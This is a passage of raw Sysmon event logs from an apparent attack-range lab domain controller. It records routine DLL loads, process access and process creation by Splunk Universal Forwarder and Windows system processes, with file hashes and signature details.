734700x8000000000000000100515Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid
734700x8000000000000000100514Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid
734700x8000000000000000100513Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid
734700x8000000000000000100512Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid
734700x8000000000000000100511Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid
734700x8000000000000000100510Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid
734700x8000000000000000100509Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\fltLib.dll10.0.14393.0 (rs1_release.160715-1616)Filter LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationfilterLib.dllMD5=051ABD8360BDA63A1BC77C662FBF0A25,SHA256=C914E2DBAEC2C9A11923A984B30A979637D3A27B3C29E93F4C90FB1D9FBC518F,IMPHASH=74D3C2DA8B6F9861866B866AE40683D3trueMicrosoft WindowsValid
734700x8000000000000000100508Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid
10341000x8000000000000000100507Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
734700x8000000000000000100506Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid
734700x8000000000000000100505Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid
734700x8000000000000000100504Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid
734700x8000000000000000100503Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exeMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02DtrueSplunk, Inc.Valid
10341000x8000000000000000100502Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x8000000000000000100501Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x8000000000000000100500Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x8000000000000000100499Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
10341000x8000000000000000100498Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-A252-6294-0500-000000005502}416532C:\Windows\system32\csrss.exe{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f
10341000x8000000000000000100497Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791
154100x8000000000000000100496Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.892{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{326FD73D-A253-6294-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service
23542300x8000000000000000100495Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.891{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A246700376CEC3F571E7E9BC9829A9D4,SHA256=E2C5AA6080AB55DA6D5E8B0A4DB958BB86D511784E5E1897FE55C784AED0A3B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space
734700x8000000000000000100596Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.906{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid
734700x8000000000000000100595Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.906{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid
734700x8000000000000000100594Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.906{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid
734700x8000000000000000100593Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.906{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid
734700x8000000000000000100592Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.906{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft WindowsValid
734700x8000000000000000100591Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.906{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\wkscli.dll10.0.14393.5066 (rs1_release.220401-1841)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid
734700x8000000000000000100590Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.906{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid
734700x8000000000000000100589Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.906{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid
734700x8000000000000000100588Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.906{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659C,IMPHASH=94524C03C5380F78283785F1E05E667DtrueMicrosoft WindowsValid
734700x8000000000000000100587Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid
734700x8000000000000000100586Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid
734700x8000000000000000100585Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid
734700x8000000000000000100584Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid
734700x8000000000000000100583Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid
734700x8000000000000000100582Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid
734700x8000000000000000100581Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid
734700x8000000000000000100580Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program
Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x8000000000000000100579Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x8000000000000000100578Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x8000000000000000100577Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:46.890{326FD73D-C166-6294-480B-000000005502}6760C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router 